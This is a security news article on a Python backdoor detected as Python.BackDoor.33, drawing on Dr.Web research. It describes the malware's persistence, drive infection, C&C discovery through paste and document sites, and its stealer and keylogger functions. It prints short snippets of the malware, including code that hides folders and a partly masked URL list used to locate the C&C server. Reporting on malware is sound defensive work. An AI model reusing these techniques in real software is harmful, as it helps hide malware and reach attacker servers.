Friday, March 29, 2024

New Python Backdoor Allows Hackers to Control Your Infected Device Remotely

A Newly discovered backdoor that was written in Python has been detected as Python.BackDoor.33 with 3  interesting futures (stealer, keylogger, backdoor) that allow hackers to take full control of your infected device.

Recent threats are mainly had backdoor capabilities and that have many advance futures such as Keylogger, screen capture, webcam, Voice Recorder, File Browser, Remote  Command  Shell and install/uninstall Future.

Malware authors used Some advanced techniques to pack this Trojan to evade the Anti Virus detection.

It contains some packed malicious utility file that helps to run python scripts on windows ordinary executable Files. The functions of this malicious program are implemented in a file mscore.pyc.

Also Read : SYSCON Backdoor Uses FTP as a Command & Control Server

How Does This Python Backdoor Works

Once This Backdoor has infected the victim’s Device It saves a copy of the file on a Drive and modifies the Windows Registry key to confirm that, it has successfully launched and shut down the Script.

This Backdoor’s Main Malicious function will execute only after restarting the computer. Once system successfully restarted then this Trojan will Infect all the drives from C to Z.

Later It creates a hidden folder to copy it’s executable and a link to root directory that refers to malicious executable file and All files different from .lnk, VolumeInformation.exe and .vbs are moved to the hidden folder created earlier.

hidden_folder = os.path.join(drive, unichr(160))
if not os.path.exists(hidden_folder):
    os.mkdir(hidden_folder)
ctypes.windll.kernel32.SetFileAttributesW(hidden_folder, 2)

Trojan try to identify the IP address an available port of the command and control server by sending a request to several Internet servers, including pastebin.com, docs.google.com, and notes.io.


url_list = [
    'http://pastebin.com/raw/xf****iX',
    'https://docs.google.com/document/d/1kKwT8qwi********Nw1g65CVDLdphA0qs'
    'http://notes.io/r***H'
]
According to Dr.Web Reseracher, If the backdoor was successful in obtaining the IP address and port, it sends a special request to the C&C server. If the Trojan receives a response , it will download the Python scripts added to the Dr.Web virus databases as Python.BackDoor.35 from the C&C server and run them on the infected device .

GLOBAL_SOCKET.sendall(str({
    'mode': 'buildClient',
    'from': 'client',
    'payload': '{}'.format(MODERATOR), # MODERATOR = "UPX"
    'key': '',
    'module_id': '',
    'session_id': '' }) + '[ENDOFMESSAGE]'

Malicious python scripts implement with 3 main Futures that is stealer, keylogger, backdoor and this Trojan will Perform following activities after infecting the victim’s machine.

  • Steal information from such browsers as Chrome, Opera, Yandex, Amigo, Torch, and Spark;
  • Perform the keylogger functions and make screenshots;
  • Download additional modules are written in Python and execute them;
  • Download files and save then on a media of the infected device;
  • Obtain contents of the specified folder;
  • “Travel” across folders;
  • Request system information.

SHA1:

  • 05cae95a3340395e363c2d6bddbc57833dbdb85c
Website

Latest articles

Google Revealed Kernel Address Sanitizer To Harden Android Firmware And Beyond

Android devices are popular among hackers due to the platform’s extensive acceptance and open-source...

Compromised SaaS Supply Chain Apps: 97% of Organizations at Risk of Cyber Attacks

Businesses increasingly rely on Software as a Service (SaaS) applications to drive efficiency, innovation,...

IT and security Leaders Feel Ill-Equipped to Handle Emerging Threats: New Survey

A comprehensive survey conducted by Keeper Security, in partnership with TrendCandy Research, has shed...

How to Analyse .NET Malware? – Reverse Engineering Snake Keylogger

Utilizing sandbox analysis for behavioral, network, and process examination provides a foundation for reverse...

GoPlus’s Latest Report Highlights How Blockchain Communities Are Leveraging Critical API Security Data To Mitigate Web3 Threats

GoPlus Labs, the leading Web3 security infrastructure provider, has unveiled a groundbreaking report highlighting...

Wireshark 4.2.4 Released: What’s New!

Wireshark stands as the undisputed leader, offering unparalleled tools for troubleshooting, analysis, development, and...
Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Mitigating Vulnerability Types & 0-day Threats

Mitigating Vulnerability & 0-day Threats

Alert Fatigue that helps no one as security teams need to triage 100s of vulnerabilities.

  • The problem of vulnerability fatigue today
  • Difference between CVSS-specific vulnerability vs risk-based vulnerability
  • Evaluating vulnerabilities based on the business impact/risk
  • Automation to reduce alert fatigue and enhance security posture significantly

Related Articles